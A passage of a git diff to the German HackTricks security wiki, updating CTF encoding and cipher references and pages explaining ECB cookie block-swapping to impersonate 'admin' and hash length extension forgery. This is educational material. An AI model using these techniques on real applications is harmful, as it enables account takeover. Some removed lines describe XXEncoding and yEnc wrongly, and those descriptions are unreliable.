[http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Tot: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` * [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### UUencoder - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Tot: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) - ### UUencoder ``` begin 644 webutils_pl @@ -156,8 +153,6 @@ end * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) ### XXEncoder - -XXEncoder ist ein Online-Tool, das verwendet werden kann, um Daten mit dem XXEncoding-Algorithmus zu kodieren. Dieser Algorithmus konvertiert die Daten in eine ASCII-Zeichenkette, die nur aus den Zeichen 'x' und 'u' besteht. Dies kann nützlich sein, um Daten zu verschleiern oder bestimmte Filtermechanismen zu umgehen, die bestimmte Zeichen verbieten. Um XXEncoder zu verwenden, geben Sie einfach die zu kodierenden Daten in das Eingabefeld ein und klicken Sie auf "Encode". Die kodierten Daten werden dann im Ausgabefeld angezeigt. ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 @@ -167,16 +162,6 @@ end * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder - -YEncoder ist ein einfacher Text-Encoder, der verwendet wird, um binäre Daten in ASCII-Zeichen zu konvertieren. Es ist ähnlich wie Base64, aber es verwendet eine andere Methode zur Codierung der Daten. - -Der YEncoder verwendet eine 7-Bit-Codierung, bei der jedes Zeichen in 7 Bits codiert wird. Dies ermöglicht die Codierung von 128 verschiedenen Zeichen. Die Codierung erfolgt durch Hinzufügen eines festen Werts zu jedem Zeichen. Dieser feste Wert wird als "Offset" bezeichnet und kann zwischen 42 und 64 liegen. - -Um eine Datei mit YEncoder zu codieren, wird jeder Byte-Wert der Datei in einen 7-Bit-Wert umgewandelt und dann der Offset-Wert addiert. Das Ergebnis wird dann als ASCII-Zeichen dargestellt. Um die Datei zu decodieren, wird der Offset-Wert von jedem ASCII-Zeichen subtrahiert und der ursprüngliche 7-Bit-Wert wiederhergestellt. - -YEncoder wird häufig in CTFs (Capture the Flag) verwendet, um versteckte Informationen in Dateien zu verbergen. Es kann auch verwendet werden, um Dateien über unsichere Kanäle zu übertragen, da die codierten Daten als Text übertragen werden können. - -Um YEncoder zu verwenden, gibt es verschiedene Tools und Skripte, die online verfügbar sind. Diese Tools ermöglichen die Codierung und Decodierung von Dateien mit YEncoder. Es ist wichtig zu beachten, dass YEncoder keine Verschlüsselungsmethode ist und die codierten Daten leicht decodiert werden können, wenn der Offset-Wert bekannt ist. ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk @@ -185,8 +170,6 @@ ryvkryvkryvkryvkryvkryvkryvk * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex - -BinHex ist ein Dateiformat, das verwendet wird, um binäre Dateien in eine ASCII-Zeichenkette zu konvertieren. Es wurde ursprünglich für die Übertragung von Dateien über E-Mail entwickelt. BinHex verwendet eine Kombination aus hexadezimalen und ASCII-Zeichen, um die binären Daten zu repräsentieren. Dieses Format wird häufig verwendet, um Dateien auf älteren Macintosh-Computern zu speichern und zu übertragen. BinHex-Dateien können mit speziellen Tools decodiert werden, um die ursprünglichen binären Daten wiederherzustellen. ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p @@ -195,8 +178,6 @@ BinHex ist ein Dateiformat, das verwendet wird, um binäre Dateien in eine ASCII * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 - -ASCII85 ist ein Kodierungsformat, das verwendet wird, um binäre Daten in druckbare ASCII-Zeichen umzuwandeln. Es wird häufig in der Kryptographie und bei der Übertragung von Daten über Textprotokolle verwendet. ASCII85 verwendet 5 Bytes binärer Daten und kodiert sie in 5 ASCII-Zeichen. Dies ermöglicht eine effiziente Darstellung von binären Daten in Textform. Die Decodierung von ASCII85 erfolgt durch Umkehrung des Kodierungsprozesses. Es gibt verschiedene Online-Tools und Bibliotheken, die die Kodierung und Decodierung von ASCII85 unterstützen. ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` @@ -206,7 +187,7 @@ ASCII85 ist ein Kodierungsformat, das verwendet wird, um binäre Daten in druckb ``` drnajapajrna ``` -* [https://www.geocachingtoolbox.com/index.php?lang=de\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=de\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) ### A1Z26 @@ -214,7 +195,7 @@ Buchstaben zu ihrem numerischen Wert ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` -### Affine-Verschlüsselung (Kodierung) +### Affine Chiffre Codierung Buchstabe zu Zahl `(ax+b)%26` (_a_ und _b_ sind die Schlüssel und _x_ ist der Buchstabe) und das Ergebnis zurück zu Buchstabe ``` @@ -222,9 +203,9 @@ krodfdudfrod ``` ### SMS-Code -**Multitap** ersetzt einen Buchstaben durch wiederholte Ziffern, die durch den entsprechenden Tastencode auf einer mobilen [Telefontastatur](https://www.dcode.fr/phone-keypad-cipher) definiert sind (Dieser Modus wird beim Schreiben von SMS verwendet).\ -Beispiel: 2=A, 22=B, 222=C, 3=D...\ -Sie können diesen Code identifizieren, indem Sie **mehrere wiederholte Zahlen** sehen. +**Multitap** ersetzt einen Buchstaben durch wiederholte Ziffern, die durch den entsprechenden Schlüsselcode auf einer mobilen [Telefontastatur](https://www.dcode.fr/phone-keypad-cipher) definiert sind (Dieser Modus wird beim Schreiben von SMS verwendet).\ +Zum Beispiel: 2=A, 22=B, 222=C, 3=D...\ +Sie können diesen Code identifizieren, weil Sie\*\* mehrere wiederholte Zahlen\*\* sehen werden. Sie können diesen Code entschlüsseln unter: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) @@ -241,9 +222,9 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ## Kompression -**Raw Deflate** und **Raw Inflate** (beide finden Sie in Cyberchef) können Daten ohne Header komprimieren und dekomprimieren. +**Raw Deflate** und **Raw Inflate** (Sie können beide in Cyberchef finden) können Daten ohne Header komprimieren und dekomprimieren. -## Einfache Kryptografie +## Einfache Krypto ### XOR - Autosolver @@ -257,7 +238,7 @@ fgaargaamnlunesuneoa ``` ### Vigenere -Ein Schlüsselwort wird benötigt. +Ein Schlüsselwort wird benötigt ``` wodsyoidrods ``` @@ -281,7 +262,7 @@ Key: ### Samir Secret Sharing -Ein Geheimnis wird in X Teile aufgeteilt und zur Wiederherstellung benötigt man Y Teile (_Y <=X_). +Ein Geheimnis wird in X Teile aufgeteilt und um es wiederherzustellen, benötigen Sie Y Teile (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 @@ -294,22 +275,23 @@ Ein Geheimnis wird in X Teile aufgeteilt und zur Wiederherstellung benötigt man * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Werkzeuge +## Tools * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) * [https://github.com/nccgroup/featherduster](https://github.com/nccgroup/featherduster) +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index c9df413bf..ba4d3bf6d 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,34 +1,35 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} # ECB -(ECB) Electronic Code Book - symmetrisches Verschlüsselungsverfahren, bei dem jeder Block des Klartexts durch den Block des Geheimtexts ersetzt wird. Es ist das **einfachste** Verschlüsselungsverfahren. Die Hauptidee besteht darin, den Klartext in **Blöcke von N Bits** (abhängig von der Größe des Eingabedatenblocks, des Verschlüsselungsalgorithmus) aufzuteilen und dann jeden Block des Klartexts mit dem einzigen Schlüssel zu verschlüsseln (entschlüsseln). +(ECB) Electronic Code Book - symmetrisches Verschlüsselungsschema, das **jeden Block des Klartexts** durch den **Block des Geheimtexts** ersetzt. Es ist das **einfachste** Verschlüsselungsschema. Die Hauptidee besteht darin, den Klartext in **Blöcke von N Bits** (abhängig von der Größe des Eingabedatenblocks, des Verschlüsselungsalgorithmus) aufzuteilen und dann jeden Block des Klartexts mit dem einzigen Schlüssel zu verschlüsseln (entschlüsseln). ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) Die Verwendung von ECB hat mehrere Sicherheitsimplikationen: -* **Blöcke aus verschlüsselter Nachricht können entfernt werden** -* **Blöcke aus verschlüsselter Nachricht können verschoben werden** +* **Blöcke aus der verschlüsselten Nachricht können entfernt werden** +* **Blöcke aus der verschlüsselten Nachricht können verschoben werden** # Erkennung der Schwachstelle Stellen Sie sich vor, Sie melden sich mehrmals bei einer Anwendung an und erhalten **immer denselben Cookie**. Dies liegt daran, dass der Cookie der Anwendung **`|`** ist.\ -Dann generieren Sie zwei neue Benutzer, beide mit dem **gleichen langen Passwort** und **fast** dem **gleichen** **Benutzernamen**.\ -Sie stellen fest, dass die **Blöcke von 8B**, in denen die **Informationen beider Benutzer** gleich sind, **gleich** sind. Sie vermuten, dass dies daran liegen könnte, dass **ECB verwendet wird**. +Dann erstellen Sie zwei neue Benutzer, beide mit dem **gleichen langen Passwort** und **fast** dem **gleichen** **Benutzernamen**.\ +Sie stellen fest, dass die **Blöcke von 8B**, in denen die **Informationen beider Benutzer** gleich sind, **gleich** sind. Dann stellen Sie sich vor, dass dies daran liegen könnte, dass **ECB verwendet wird**. Wie im folgenden Beispiel. Beachten Sie, wie diese **2 decodierten Cookies** mehrmals den Block **`\x23U\xE45K\xCB\x21\xC8`** enthalten. ``` @@ -36,28 +37,28 @@ Wie im folgenden Beispiel. Beachten Sie, wie diese **2 decodierten Cookies** meh \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` -Dies liegt daran, dass der **Benutzername und das Passwort dieser Cookies mehrmals den Buchstaben "a"** enthalten haben (zum Beispiel). Die **unterschiedlichen Blöcke** sind Blöcke, die **mindestens ein unterschiedliches Zeichen** enthalten (vielleicht das Trennzeichen "|" oder einen notwendigen Unterschied im Benutzernamen). +Das liegt daran, dass der **Benutzername und das Passwort dieser Cookies mehrmals den Buchstaben "a" enthalten** (zum Beispiel). Die **Blöcke**, die **unterschiedlich** sind, sind Blöcke, die **mindestens 1 unterschiedliches Zeichen** enthielten (vielleicht das Trennzeichen "|" oder einen notwendigen Unterschied im Benutzernamen). -Nun muss der Angreifer nur noch herausfinden, ob das Format `` oder `` ist. Dazu kann er einfach **mehrere Benutzernamen** mit **ähnlichen und langen Benutzernamen und Passwörtern generieren**, bis er das Format und die Länge des Trennzeichens findet: +Nun muss der Angreifer nur noch herausfinden, ob das Format `` oder `` ist. Um das zu tun, kann er einfach **mehrere Benutzernamen** mit **ähnlichen und langen Benutzernamen und Passwörtern generieren, bis er das Format und die Länge des Trennzeichens findet:** -| Länge des Benutzernamens: | Länge des Passworts: | Länge von Benutzername+Passwort: | Länge des Cookies (nach dem Decodieren): | -| ------------------------ | -------------------- | --------------------------------- | --------------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +| Benutzername Länge: | Passwort Länge: | Benutzername+Passwort Länge: | Länge des Cookies (nach dem Dekodieren): | +| ------------------- | ---------------- | ---------------------------- | ---------------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | # Ausnutzung der Schwachstelle ## Entfernen ganzer Blöcke -Nachdem das Format des Cookies bekannt ist (`|`), um den Benutzernamen `admin` zu imitieren, erstellen Sie einen neuen Benutzer namens `aaaaaaaaadmin`, erhalten Sie den Cookie und decodieren Sie ihn: +Nachdem das Format des Cookies bekannt ist (`|`), um den Benutzernamen `admin` zu übernehmen, erstellen Sie einen neuen Benutzer namens `aaaaaaaaadmin` und erhalten Sie den Cookie und dekodieren Sie ihn: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` -Wir können das zuvor erstellte Muster `\x23U\xE45K\xCB\x21\xC8` mit dem Benutzernamen sehen, der nur `a` enthielt.\ -Dann können Sie den ersten Block von 8B entfernen und Sie erhalten einen gültigen Cookie für den Benutzernamen `admin`: +Wir können das Muster `\x23U\xE45K\xCB\x21\xC8`, das zuvor mit dem Benutzernamen erstellt wurde, der nur `a` enthielt, sehen.\ +Dann können Sie den ersten Block von 8B entfernen und Sie erhalten ein gültiges Cookie für den Benutzernamen `admin`: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` @@ -65,30 +66,15 @@ Dann können Sie den ersten Block von 8B entfernen und Sie erhalten einen gülti In vielen Datenbanken ist es gleich, nach `WHERE username='admin';` oder nach `WHERE username='admin ';` zu suchen _(Beachten Sie die zusätzlichen Leerzeichen)_ -Eine weitere Möglichkeit, den Benutzer `admin` zu imitieren, besteht darin: +Eine weitere Möglichkeit, den Benutzer `admin` zu imitieren, wäre: -* Generieren Sie einen Benutzernamen, der `len() + len() % len(block)` entspricht. Mit einer Blockgröße von `8B` können Sie einen Benutzernamen namens `username ` generieren, wobei das Trennzeichen `|` den Chunk `` erzeugt, der 2 Blöcke von 8Bs erzeugt. -* Generieren Sie dann ein Passwort, das eine genaue Anzahl von Blöcken enthält, die den Benutzernamen, den wir imitieren möchten, und Leerzeichen enthalten, z. B.: `admin ` +* Generieren Sie einen Benutzernamen, der folgendes erfüllt: `len() + len(` 2 Blöcke von 8Bs generieren wird. +* Generieren Sie dann ein Passwort, das eine genaue Anzahl von Blöcken ausfüllt, die den Benutzernamen enthalten, den wir imitieren möchten, und Leerzeichen, wie z.B.: `admin ` -Das Cookie dieses Benutzers besteht aus 3 Blöcken: den ersten 2 Blöcken des Benutzernamens + Trennzeichen und dem dritten Block des Passworts (das den Benutzernamen fälscht): `username |admin ` +Das Cookie dieses Benutzers wird aus 3 Blöcken bestehen: die ersten 2 Blöcke sind die Blöcke des Benutzernamens + Trennzeichen und der dritte Block des Passworts (das den Benutzernamen fälscht): `Benutzername |admin ` -**Ersetzen Sie dann einfach den ersten Block durch den letzten und Sie werden den Benutzer `admin` imitieren: `admin |username`** +**Dann ersetzen Sie einfach den ersten Block durch den letzten und werden den Benutzer `admin` imitieren: `admin |Benutzername`** ## Referenzen * [http://cryptowiki.net/index.php?title=Electronic_Code_Book\_(ECB)](http://cryptowiki.net/index.php?title=Electronic_Code_Book_\(ECB\)) - - -
- -Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/cryptography/hash-length-extension-attack.md b/cryptography/hash-length-extension-attack.md index 41ec6f8d5..eaf8a0e80 100644 --- a/cryptography/hash-length-extension-attack.md +++ b/cryptography/hash-length-extension-attack.md @@ -1,42 +1,43 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} # Zusammenfassung des Angriffs -Stellen Sie sich einen Server vor, der einige **Daten** durch **Anhängen** eines **Geheimnisses** an einige bekannte Klartextdaten signiert und dann diese Daten hasht. Wenn Sie wissen: +Stellen Sie sich einen Server vor, der einige **Daten** durch **Anhängen** eines **Geheimnisses** an einige bekannte Klartextdaten signiert und dann diese Daten hasht. Wenn Sie Folgendes wissen: -* **Die Länge des Geheimnisses** (diese kann auch aus einem gegebenen Längenbereich bruteforced werden) +* **Die Länge des Geheimnisses** (dies kann auch aus einem gegebenen Längenbereich bruteforce sein) * **Die Klartextdaten** -* **Den Algorithmus (und dass er anfällig für diesen Angriff ist)** +* **Der Algorithmus (und er ist anfällig für diesen Angriff)** * **Das Padding ist bekannt** * Normalerweise wird ein Standard-Padding verwendet, daher ist dies auch der Fall, wenn die anderen 3 Anforderungen erfüllt sind -* Das Padding variiert je nach Länge des Geheimnisses+Daten, daher wird die Länge des Geheimnisses benötigt +* Das Padding variiert je nach Länge des Geheimnisses+Daten, daher ist die Länge des Geheimnisses erforderlich Dann ist es für einen **Angreifer** möglich, **Daten anzuhängen** und eine gültige **Signatur** für die **vorherigen Daten + angehängte Daten** zu **generieren**. ## Wie? -Grundsätzlich generieren die anfälligen Algorithmen die Hashes, indem sie zunächst einen Block von Daten hashen und dann aus dem zuvor erstellten Hash (Zustand) den nächsten Datenblock hinzufügen und diesen hashen. +Grundsätzlich generieren die anfälligen Algorithmen die Hashes, indem sie zunächst einen Block von Daten hashen und dann aus dem zuvor erstellten Hash (Zustand) den nächsten Datenblock hinzufügen und ihn hashen. -Stellen Sie sich vor, das Geheimnis lautet "geheim" und die Daten lauten "daten", der MD5 von "geheimdaten" ist 6036708eba0d11f6ef52ad44e8b74d5b.\ +Stellen Sie sich vor, das Geheimnis lautet "Geheimnis" und die Daten lauten "Daten", der MD5 von "GeheimnisDaten" lautet 6036708eba0d11f6ef52ad44e8b74d5b.\ Wenn ein Angreifer den String "anhängen" anhängen möchte, kann er: * Einen MD5 von 64 "A"s generieren * Ändern Sie den Zustand des zuvor initialisierten Hashs in 6036708eba0d11f6ef52ad44e8b74d5b * Hängen Sie den String "anhängen" an -* Beenden Sie den Hash und der resultierende Hash wird ein **gültiger Hash für "geheim" + "daten" + "Padding" + "anhängen"** sein +* Beenden Sie den Hash und der resultierende Hash wird ein **gültiger Hash für "Geheimnis" + "Daten" + "Padding" + "anhängen"** sein ## **Werkzeug** @@ -44,19 +45,20 @@ Wenn ein Angreifer den String "anhängen" anhängen möchte, kann er: ## Referenzen -Sie können diesen Angriff gut erklärt finden unter [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) +Sie können diesen Angriff gut erklärt unter [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) finden +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} diff --git a/cryptography/padding-oracle-priv.md b/cryptography/padding-oracle-priv.md index 84f06007f..5e313d397 100644 --- a/cryptography/padding-oracle-priv.md +++ b/cryptography/padding-oracle-priv.md @@ -1,25 +1,25 @@ +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
